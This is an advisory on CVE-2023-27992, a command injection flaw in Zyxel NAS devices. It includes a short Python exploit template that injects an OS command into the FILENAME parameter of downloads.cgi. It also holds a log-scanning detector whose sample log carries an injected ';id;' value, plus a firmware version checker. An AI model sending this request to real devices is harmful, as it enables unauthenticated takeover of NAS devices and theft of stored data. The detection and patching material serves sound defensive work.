CVE-2023-27992: Pre-Authentication Command Injection Vulnerability in Zyxel NAS Devices

A pre-authentication command injection vulnerability has been discovered in Zyxel NAS326, NAS540, and NAS542 devices. This vulnerability, identified as CVE-2023-27992, could allow an unauthenticated attacker to execute operating system (OS) commands remotely by sending a crafted HTTP request. All Zyxel NAS326 firmware versions prior to V5.21(AAZF.14)C, NAS540 firmware versions prior to V5.21(AATB.11)C, and NAS542 firmware versions prior to V5.21(ABAG.11)C are affected by this vulnerability.

Overview

This vulnerability stems from the firmware's failure to properly sanitize user input, which makes it possible for an attacker to inject OS commands and have them executed without authentication. By sending a crafted HTTP request, a remote attacker could execute arbitrary code on the affected device, potentially gaining total control over it and the data stored on it.

Exploit Details

To exploit this vulnerability, an attacker would need to send a carefully crafted HTTP request to a vulnerable Zyxel NAS device. Below is a simple Python script that demonstrates how a payload could be crafted and sent to the target device:

import requests

# Replace target_ip with the actual target's base URL (scheme and IP address)
target_ip = 'http://192.168.1.1'
payload = '; YOUR_COMMAND_HERE ;'  # Replace with desired OS command

# The command is injected through the FILENAME parameter of downloads.cgi
url = f'{target_ip}/cgi-bin/downloads.cgi?FILE;/USB_1/&XUA_NOT_EMPTY;/&NO_LINK;/&FILENAME;{payload}'

response = requests.get(url)

In this code snippet, replace YOUR_COMMAND_HERE with the desired OS command and replace target_ip with the actual target's IP address. If successful, the target device will execute the payload and may provide useful information as a result.
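From the defender's side, the same request shape is what a web-log review should flag: a request to /cgi-bin/downloads.cgi whose FILENAME value carries shell metacharacters. The following detection script is an added example and is not part of the original advisory or any Zyxel code. It assumes access logs in the common combined format and that query parameters are laid out as NAME;VALUE pairs joined by '&', exactly as in the script above; the log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
192.168.1.50 - - [19/Jun/2023:12:15:00 +0000] "GET /cgi-bin/downloads.cgi?FILE;/USB_1/&XUA_NOT_EMPTY;/&NO_LINK;/&FILENAME;report.pdf HTTP/1.1" 200 4096
192.168.1.77 - - [19/Jun/2023:12:16:03 +0000] "GET /cgi-bin/downloads.cgi?FILE;/USB_1/&XUA_NOT_EMPTY;/&NO_LINK;/&FILENAME;%3Bid%3B HTTP/1.1" 200 512
192.168.1.50 - - [19/Jun/2023:12:17:10 +0000] "GET /r/index.html HTTP/1.1" 200 1024
"""

# client-ip ident user [timestamp] "METHOD target PROTO" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Characters a shell would interpret if they reached a command line unescaped.
SHELL_META = re.compile(r'[;|`\n]|\$\(|&&')


def parse_params(query):
    """Split the query string into (name, value) pairs.

    Assumption: parameters are separated by '&' and each one is NAME;VALUE,
    matching the request layout used in the script above. Values are URL-decoded
    so that encoded metacharacters such as %3B are seen as ';'.
    """
    pairs = []
    for part in query.split('&'):
        name, _, value = part.partition(';')
        pairs.append((name, unquote(value)))
    return pairs


def find_injection_attempts(log_text):
    """Return one finding per parameter value of downloads.cgi that contains shell metacharacters."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        src_ip, timestamp, method, target, status = m.groups()
        parts = urlsplit(target)
        if not parts.path.endswith('/cgi-bin/downloads.cgi'):
            continue
        for name, value in parse_params(parts.query):
            if SHELL_META.search(value):
                findings.append({
                    'src_ip': src_ip,
                    'time': timestamp,
                    'method': method,
                    'param': name,
                    'value': value,
                    'status': status,
                })
    return findings


if __name__ == '__main__':
    for hit in find_injection_attempts(SAMPLE_LOG):
        print(f"{hit['time']} {hit['src_ip']} {hit['param']}={hit['value']!r} (HTTP {hit['status']})")
```

The legitimate-looking first line is not flagged even though its query contains semicolons, because the check is applied to each decoded parameter value rather than to the raw query string; only the second line, whose FILENAME value decodes to ';id;', is reported. A 200 status on such a request is worth treating as a possible successful execution until the device's firmware version has been confirmed.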

Mitigation and Patching

To mitigate this vulnerability, it is essential to install the latest security patch provided by Zyxel on the affected NAS devices. Zyxel has already released firmware updates addressing the CVE-2023-27992 vulnerability:

- NAS326: Download firmware V5.21(AAZF.14)C here
- NAS540: Download firmware V5.21(AATB.11)C here
- NAS542: Download firmware V5.21(ABAG.11)C here
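To check a fleet against the fixed versions listed above, the version strings have to be compared numerically rather than as text. The script below is an added example, not Zyxel's or the advisory's own tooling. It assumes that Zyxel firmware versions follow the pattern V<major>.<minor>(<branch>.<patch>)<suffix> seen in the three fixed versions, that the letter code in parentheses identifies the model line, and that a device is vulnerable when its (major, minor, patch) tuple is below the fixed one; the inventory is constructed for illustration.

```python
import re

# Fixed firmware versions for each model, as listed in the advisory.
FIXED_VERSIONS = {
    'NAS326': 'V5.21(AAZF.14)C',
    'NAS540': 'V5.21(AATB.11)C',
    'NAS542': 'V5.21(ABAG.11)C',
}

# Assumption: versions look like V<major>.<minor>(<branch>.<patch>)<suffix>.
VERSION_RE = re.compile(r'^V(\d+)\.(\d+)\(([A-Z]+)\.(\d+)\)(\w*)$')


def parse_version(version):
    """Return ((major, minor, patch), branch) for a Zyxel-style version string."""
    m = VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f'unrecognised version string: {version!r}')
    major, minor, branch, patch, _suffix = m.groups()
    return (int(major), int(minor), int(patch)), branch


def is_vulnerable(model, version):
    """True when the installed firmware is older than the fixed release for that model."""
    if model not in FIXED_VERSIONS:
        raise ValueError(f'model {model!r} is not covered by this advisory')
    installed, branch = parse_version(version)
    fixed, fixed_branch = parse_version(FIXED_VERSIONS[model])
    if branch != fixed_branch:
        # A different branch code means the string belongs to another model line;
        # refuse to compare rather than report a misleading result.
        raise ValueError(f'{version} is not a {model} firmware (expected branch {fixed_branch})')
    return installed < fixed


def triage(inventory):
    """inventory: iterable of (hostname, model, version). Returns hosts that still need the update."""
    return [host for host, model, version in inventory if is_vulnerable(model, version)]


# Constructed inventory for illustration; not real devices.
INVENTORY = [
    ('nas-a', 'NAS326', 'V5.21(AAZF.13)C'),  # one patch level behind the fix
    ('nas-b', 'NAS326', 'V5.21(AAZF.14)C'),  # exactly the fixed version
    ('nas-c', 'NAS540', 'V5.20(AATB.11)C'),  # same patch number but older minor version
    ('nas-d', 'NAS542', 'V5.21(ABAG.12)C'),  # newer than the fix
]

if __name__ == '__main__':
    for host in triage(INVENTORY):
        print(f'{host}: update required')
```

Comparing the tuple rather than the raw string matters for the third entry: a plain string comparison of patch numbers would miss that V5.20 is older than V5.21 regardless of its patch level.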

To further ensure your device's security, it is recommended to follow network security best practices, such as deploying network intrusion detection systems and firewalls and enforcing strong access control policies.

Conclusion

CVE-2023-27992 represents a significant security risk that could easily result in unauthorized access and control over Zyxel NAS326, NAS540, and NAS542 devices. It is essential for network administrators and users to update their firmware to the latest version to protect against this vulnerability. Following network security best practices will further help mitigate the risks associated with this vulnerability.

Timeline

Published on: 06/19/2023 12:15:00 UTC
Last modified on: 06/20/2023 07:12:00 UTC